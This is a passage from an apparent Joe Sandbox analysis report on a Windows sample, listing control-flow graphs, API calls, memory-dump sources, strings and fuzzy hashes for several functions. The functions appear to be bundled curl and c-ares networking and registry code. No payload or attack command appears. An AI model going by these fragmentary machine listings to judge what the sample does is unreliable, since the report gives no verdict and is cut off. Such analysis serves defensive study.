219f2d 1081->1104 1091 219eb3-219ec4 call 20e9c0 1082->1091 1113 219eb0-219eb1 1083->1113 1114 21a04a-21a04c 1083->1114 1109 219d71-219d73 1086->1109 1110 219dc2 1086->1110 1087->1060 1106 219d3e-219d42 1087->1106 1091->950 1116 219eca-219ed0 1091->1116 1103 219e06-219e21 call 20e9f0 call 20e4a0 1093->1103 1100 219e38-219e3b 1094->1100 1101 219e3d-219e5b call 20ebf0 * 2 1094->1101 1124 219c35 1098->1124 1125 219c66-219c75 call 2178a0 1098->1125 1100->1101 1111 219e5e-219e67 1100->1111 1101->1111 1140 219de1-219dee call 20ec80 1103->1140 1141 219e23-219e2c call 20eac0 1103->1141 1104->1025 1106->1059 1121 219d9a-219db5 call 20e9f0 call 20e4a0 1109->1121 1110->1071 1111->1059 1111->1091 1113->1091 1119 21a057-21a070 call 20ebf0 * 2 1114->1119 1120 21a04e-21a051 1114->1120 1123 219ee5-219ef2 call 20e9f0 1116->1123 1119->1004 1120->964 1120->1119 1154 219d75-219d82 call 20ec80 1121->1154 1155 219db7-219dc0 call 20eac0 1121->1155 1123->950 1148 219ef8-219f0e call 20e440 1123->1148 1132 219c37-219c51 call 20e9f0 1124->1132 1144 21a011 1125->1144 1145 219c7b-219c8f call 20e7c0 1125->1145 1132->1008 1170 219c57-219c64 call 20e9d0 1132->1170 1164 219df1-219e04 call 20e960 1140->1164 1141->1164 1144->1012 1145->1008 1165 219c95-21a00e 1145->1165 1168 219f10-219f26 call 20e3c0 1148->1168 1169 219ed2-219edf call 20e9e0 1148->1169 1175 219d85-219d98 call 20e960 1154->1175 1155->1175 1164->1094 1164->1103 1165->1144 1168->1169 1184 219f28 1168->1184 1169->950 1169->1123 1170->1125 1170->1132 1175->1110 1175->1121 1184->964
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00219946
                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00219974
                              • RegCloseKey.KERNELBASE(?), ref: 0021998B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                              • API String ID: 3677997916-4129964100
                              • Opcode ID: 4a91aac5511a28494468458baee6a3f8083cc83e945e0aa1932c9857309d11b8
                              • Instruction ID: 9a2804904d0efb0184d8a8a907f9a9169cf24f2ceec440ca3b42bd8eca916ac2
                              • Opcode Fuzzy Hash: 4a91aac5511a28494468458baee6a3f8083cc83e945e0aa1932c9857309d11b8
                              • Instruction Fuzzy Hash: A532B7B1924302ABEB11AF20EC52A5B76E4AF64314F094834F90996253F731E9F5CB93
                              Function 00152F17 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 144registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1360 152f17-152f8c call 606430 call 606820 1365 1531c9-1531cd 1360->1365 1366 152f91-152ff4 call 151619 RegOpenKeyExA 1365->1366 1367 1531d3-1531d6 1365->1367 1370 1531c5 1366->1370 1371 152ffa-15300b 1366->1371 1370->1365 1372 15315c-1531ac RegEnumKeyExA 1371->1372 1373 153010-153083 call 151619 RegOpenKeyExA 1372->1373 1374 1531b2-1531c2 1372->1374 1378 15314e-153152 1373->1378 1379 153089-1530d4 RegQueryValueExA 1373->1379 1374->1370 1378->1372 1380 1530d6-153137 call 606700 call 606790 call 606820 call 606630 call 606820 call 604b90 1379->1380 1381 15313b-15314b RegCloseKey 1379->1381 1380->1381 1381->1378
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: EnumOpen
                              • String ID: Xlo$Xlo$lo
                              • API String ID: 3231578192-1835291670
                              • Opcode ID: 8287a34a065cb47ff29ab7b7a8488efc460ed2953ae2861963aa90c060b2c81e
                              • Instruction ID: ca7b5084c34d957e57630773edb74f36b60e5c2a815d3741e3096b373e9220d4
                              • Opcode Fuzzy Hash: 8287a34a065cb47ff29ab7b7a8488efc460ed2953ae2861963aa90c060b2c81e
                              • Instruction Fuzzy Hash: 267190B49043199FDB50DF69C98479EBBF1FF84308F10886DE9989B241D7749A888F92
                              Function 00188B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1394 188b50-188b69 1395 188b6b-188b74 1394->1395 1396 188be6 1394->1396 1398 188beb-188bf2 1395->1398 1399 188b76-188b8d 1395->1399 1397 188be9 1396->1397 1397->1398 1400 188b8f-188ba7 call 166e40 1399->1400 1401 188bf3-188bfe call 18a550 1399->1401 1408 188cd9-188d16 SleepEx 1400->1408 1409 188bad-188baf 1400->1409 1406 188de4-188def 1401->1406 1407 188c04-188c08 1401->1407 1412 188e8c-188e95 1406->1412 1413 188df5-188e19 call 18a150 1406->1413 1410 188dbd-188dc3 1407->1410 1411 188c0e-188c1d 1407->1411 1430 188d18-188d20 1408->1430 1431 188d22 1408->1431 1414 188bb5-188bb9 1409->1414 1415 188ca6-188cb0 1409->1415 1410->1397 1418 188c1f-188c30 connect 1411->1418 1419 188c35-188c48 call 18a150 1411->1419 1416 188f00-188f06 1412->1416 1417 188e97-188e9c 1412->1417 1451 188e88 1413->1451 1452 188e1b-188e26 1413->1452 1414->1398 1422 188bbb-188bc2 1414->1422 1415->1408 1420 188cb2-188cb8 1415->1420 1416->1398 1424 188e9e-188eb6 call 162a00 1417->1424 1425 188edf-188eef call 1578b0 1417->1425 1418->1419 1450 188c4d-188c4f 1419->1450 1426 188ddc-188dde 1420->1426 1427 188cbe-188cd4 call 18b180 1420->1427 1422->1398 1429 188bc4-188bcc 1422->1429 1424->1425 1449 188eb8-188edd call 163410 * 2 1424->1449 1454 188ef2-188efc 1425->1454 1426->1397 1426->1406 1427->1406 1435 188bce-188bd2 1429->1435 1436 188bd4-188bda 1429->1436 1438 188d26-188d39 1430->1438 1431->1438 1435->1398 1435->1436 1436->1398 1443 188bdc-188be1 1436->1443 1446 188d3b-188d3d 1438->1446 1447 188d43-188d61 call 16d8c0 call 18a150 1438->1447 1453 188dac-188db8 call 1950a0 1443->1453 1446->1426 1446->1447 1469 188d66-188d74 1447->1469 1449->1454 1457 188c8e-188c93 1450->1457 1458 188c51-188c58 1450->1458 1451->1412 1459 188e28-188e2c 1452->1459 1460 188e2e-188e85 call 16d090 call 194fd0 1452->1460 1453->1398 1454->1416 1462 188dc8-188dd9 call 18b100 1457->1462 1463 188c99-188c9f 1457->1463 1458->1457 1466 188c5a-188c62 1458->1466 1459->1451 1459->1460 1460->1451 1462->1426 1463->1415 1470 188c6a-188c70 1466->1470 1471 188c64-188c68 1466->1471 1469->1398 1475 188d7a-188d81 1469->1475 1470->1457 1477 188c72-188c8b call 1950a0 1470->1477 1471->1457 1471->1470 1475->1398 1479 188d87-188d8f 1475->1479 1477->1457 1483 188d9b-188da1 1479->1483 1484 188d91-188d95 1479->1484 1483->1398 1487 188da7 1483->1487 1484->1398 1484->1483 1487->1453
                              APIs
                              • connect.WS2_32(?,?,00000001), ref: 00188C30
                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00188CF3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: Sleepconnect
                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                              • API String ID: 238548546-879669977
                              • Opcode ID: 237361e33ef9d29b2f956ad34104101d081b7e4a798723baabc168205ae41e14
                              • Instruction ID: 70e04813a718c8b3a53fafdb052ad3fe6164681a55bbaa02b962020e634a378d
                              • Opcode Fuzzy Hash: 237361e33ef9d29b2f956ad34104101d081b7e4a798723baabc168205ae41e14
                              • Instruction Fuzzy Hash: C3B1C170604705AFDB10EF24CC85BA6B7E1AF95314F44862CF8594B2D2DB71EE54CB61
                              Function 00189290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1488 189290-1892ed call 1576a0 1491 1893c3-1893ce 1488->1491 1492 1892f3-1892fb 1488->1492 1501 1893d0-1893e1 1491->1501 1502 1893e5-189427 call 16d090 call 194f40 1491->1502 1493 1893aa-1893af 1492->1493 1494 189301-189333 call 16d8c0 call 16d9a0 1492->1494 1495 1893b5-1893bc 1493->1495 1496 189456-189470 1493->1496 1513 189335-189364 WSAIoctl 1494->1513 1514 1893a7 1494->1514 1499 189429-189431 1495->1499 1500 1893be 1495->1500 1504 189439-18943f 1499->1504 1505 189433-189437 1499->1505 1500->1496 1501->1495 1506 1893e3 1501->1506 1502->1496 1502->1499 1504->1496 1509 189441-189453 call 1950a0 1504->1509 1505->1496 1505->1504 1506->1496 1509->1496 1518 18939b-1893a4 1513->1518 1519 189366-18936f 1513->1519 1514->1493 1518->1514 1519->1518 1520 189371-189390 setsockopt 1519->1520 1520->1518 1521 189392-189395 1520->1521 1521->1518
                              APIs
                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0018935C
                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00189389
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: Ioctlsetsockopt
                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                              • API String ID: 1903391676-2691795271
                              • Opcode ID: 12bfe1654ab4818cb8215c23722fc6f75919eb1c32778aede684f1eea18c5efd
                              • Instruction ID: d6f9cb03e5a7c03be8b2f687cd9823f7a69d92d1ffba12c934bc3692233d2643
                              • Opcode Fuzzy Hash: 12bfe1654ab4818cb8215c23722fc6f75919eb1c32778aede684f1eea18c5efd
                              • Instruction Fuzzy Hash: BF51C371A04305ABDB14EF24CC81FBAB7A5FF85314F188529FD589B282E731EA51CB91
                              Function 001576A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1522 1576a0-1576be 1523 1576e6-1576f2 send 1522->1523 1524 1576c0-1576c7 1522->1524 1525 1576f4-157709 call 1572a0 1523->1525 1526 15775e-157762 1523->1526 1524->1523 1527 1576c9-1576d1 1524->1527 1525->1526 1529 1576d3-1576e4 1527->1529 1530 15770b-157759 call 1572a0 call 15cb20 call 4d8c50 1527->1530 1529->1525 1530->1526
                              APIs
                              • send.WS2_32(multi.c,?,?,?,00153D4E,00000000,?,?,001607BF), ref: 001576EB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: send
                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                              • API String ID: 2809346765-3388739168
                              • Opcode ID: 2b97b339586b54363679a80106ad22fb4cd774a8c55d7837f242af2c8475507b
                              • Instruction ID: 7225f28db9cce0f9f059ea8ead45b18becb0d8b965da4ee66b6702fb0e3c6351
                              • Opcode Fuzzy Hash: 2b97b339586b54363679a80106ad22fb4cd774a8c55d7837f242af2c8475507b
                              • Instruction Fuzzy Hash: D3113DB551C748BBE120AB19BC4BD377B5DDBC2B5AF450918BC245B381D361DC04C6B2
                              Function 001575E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1641 1575e0-1575ed 1642 157607-157629 socket 1641->1642 1643 1575ef-1575f6 1641->1643 1645 15763f-157642 1642->1645 1646 15762b-15763c call 1572a0 1642->1646 1643->1642 1644 1575f8-1575ff 1643->1644 1647 157601-157602 1644->1647 1648 157643-157699 call 1572a0 call 15cb20 call 4d8c50 1644->1648 1646->1645 1647->1642
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: socket
                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                              • API String ID: 98920635-842387772
                              • Opcode ID: fd82009af401802ce0008634ae1c6f6dfec056abdf39dae4febc3712831fbd5e
                              • Instruction ID: 8d7903cb1e82721163e60a0eb87539136731a31b9179aba2fee008e4941b00ec
                              • Opcode Fuzzy Hash: fd82009af401802ce0008634ae1c6f6dfec056abdf39dae4febc3712831fbd5e
                              • Instruction Fuzzy Hash: AA118C76A04B156BE6216B38BC47F9B3B95DF82726F050914FC209A2D2D751C858C2E2
                              Function 0018A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1750 18a150-18a159 1751 18a15f-18a17b 1750->1751 1752 18a250 1750->1752 1753 18a249-18a24f 1751->1753 1754 18a181-18a1ce getsockname 1751->1754 1753->1752 1755 18a1d0-18a1f5 call 16d090 1754->1755 1756 18a1f7-18a214 call 18ef30 1754->1756 1764 18a240-18a246 call 194f40 1755->1764 1756->1753 1761 18a216-18a23b call 16d090 1756->1761 1761->1764 1764->1753
                              APIs
                              • getsockname.WS2_32(?,?,00000080), ref: 0018A1C7
                              Strings
                              • getsockname() failed with errno %d: %s, xrefs: 0018A1F0
                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0018A23B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: getsockname
                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                              • API String ID: 3358416759-2605427207
                              • Opcode ID: 9aecdf613302e1c168ea1ae9a87e824dbc4db7e9b53795776143c18ab783b5da
                              • Instruction ID: 8aac7cc8b7bc4ce17748a3e54990ed2a06cd1aeab417e344128698eb206bdd26
                              • Opcode Fuzzy Hash: 9aecdf613302e1c168ea1ae9a87e824dbc4db7e9b53795776143c18ab783b5da
                              • Instruction Fuzzy Hash: 4821EC71808680ABF7259719DC46FE773BCEF91334F040655F99853151FB325A858BE2
                              Function 0016D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1770 16d5e0-16d5ee 1771 16d652-16d662 WSAStartup 1770->1771 1772 16d5f0-16d604 call 16d690 1770->1772 1773 16d664-16d66f 1771->1773 1774 16d670-16d676 1771->1774 1778 16d606-16d614 1772->1778 1779 16d61b-16d651 call 177620 1772->1779 1774->1772 1777 16d67c-16d68d 1774->1777 1778->1779 1784 16d616 1778->1784 1784->1779
                              APIs
                              • WSAStartup.WS2_32(00000202), ref: 0016D65A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
